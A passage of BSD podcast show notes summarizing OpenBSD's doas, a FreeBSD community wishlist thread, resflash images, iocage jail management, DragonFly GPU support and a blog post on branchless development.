dirty check reveals that doas is around 350 lines of code, while sudo is around 10,000 - which would you rather have as a setuid root binary? After the initial import, a number of developers began reviewing and improving various bits here and there You can check out the code (http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/doas/) now if you're interested Command usage (http://www.openbsd.org/cgi-bin/man.cgi/OpenBSD-current/man1/doas.1) and config syntax (http://www.openbsd.org/cgi-bin/man.cgi/OpenBSD-current/man5/doas.conf.5) seem pretty straightforward More discussion (https://news.ycombinator.com/item?id=9914693) on HN *** What would you like to see in FreeBSD (https://www.reddit.com/r/freebsd/comments/3d80vt/what_would_you_like_to_see_in_freebsd/) Adrian Chadd started a reddit thread about areas in which FreeBSD could be improved, asking the community what they'd like to see There are over 200 comments that span a wide range of topics, so we'll just cover a few of the more popular requests - check the very long thread if you're interested in more The top comment says things don't "just work," citing failover link aggregation of LACP laggs, PPPoE issues, disorganized jail configuration options, unclear CARP configuration and userland dtrace being unstable Another common one was that there are three firewalls in the base system, with ipfilter and pf being kinda dead now - should they be removed, and more focus put into ipfw? Video drivers also came up frequently, with users hoping for better OpenGL support and support for newer graphics cards from Intel and AMD - similar comments were made about wireless chipsets as well Some other replies included more clarity with pkgng output, paying more attention to security issues, updating PF to match the one in OpenBSD, improved laptop support, a graphical installer, LibreSSL in base, more focus on embedded MIPS devices, binary packages with different config options, steam support and lots more At least one user suggested better "marketing" for FreeBSD, with more advocacy and (hopefully) more business adoption That one really applies to all the BSDs, and regular users (that's you listening to this) can help make it happen for whichever ones you use right now Maybe Adrian can singlehandedly do all the work and make all the users happy *** Interview - Ryan Lortie & Baptiste Daroussin Porting the latest GNOME code to FreeBSD News Roundup Introducing resflash (http://stable.rcesoftware.com/resflash/) If you haven't heard of resflash before, it's "a tool for building OpenBSD images for embedded and cloud environments in a programmatic, reproducible way" One of the major benefits to images like this is the read-only filesystem, so there's no possibility of filesystem corruption if power is lost There's an optional read-write partition as well, used for any persistent changes you want to make You can check out the source code on Github (https://github.com/bconway/resflash) or read the main site for more info *** Jails with iocage (http://pid1.com/posts/post10.html) There are a growing number of FreeBSD jail management utilities: ezjail, cbsd, warden and a few others After looking at all the different choices, the author of this blog post eventually settled on iocage (https://github.com/iocage/iocage) for the job The post walks you through the basic configuration and usage of iocage for creating managing jails If you've been unhappy with ezjail or some of the others, iocage might be worth giving a try instead (it also has really good ZFS integration) *** DragonFly GPU improvements (http://lists.dragonflybsd.org/pipermail/users/2015-July/207892.html) DragonFlyBSD continues to up their graphics game, this time with Intel's ValleyView series of CPUs These GPUs are primarily used in the newer Atom CPUs and offer much better performance than the older ones A git branch was created to hold the fixes for now while the last remaining bugs get fixed Fully-accelerated Broadwell support and an update to newer DRM code are also available in the git branch, and will be merged to the main tree after some testing *** Branchless development (http://www.tedunangst.com/flak/post/branchless-development) Ted Unangst has a new blog post up, talking about software branches and the effects of having (or not having) them He covers integrating and merging code, and the versioning problems that can happen with multiple people contributing at once "For an open source project, branching is counter intuitively antisocial. For instance, I usually tell people I'm running OpenBSD, but that's kind of a lie. I'm actually running teduBSD, which is like OpenBSD but has some changes to make it even better. Of course, you can't have teduBSD because I'm selfish. I'm also lazy, and only inclined to make my changes work for me, not everyone else." The solution, according to him, is bringing all the code the developers are using closer together One big benefit is that WIP code gets tested much faster (and bugs get fixed early on) *** Feedback/Questions Matthew writes in (http://slexy.org/view/s21yQtBCCK) Chris writes in (http://slexy.org/view/s21oFA80kY) Anonymous writes in (http://slexy.org/view/s2JYvTlJlm) Bill writes in (http://slexy.org/view/s21LXvk53z) ***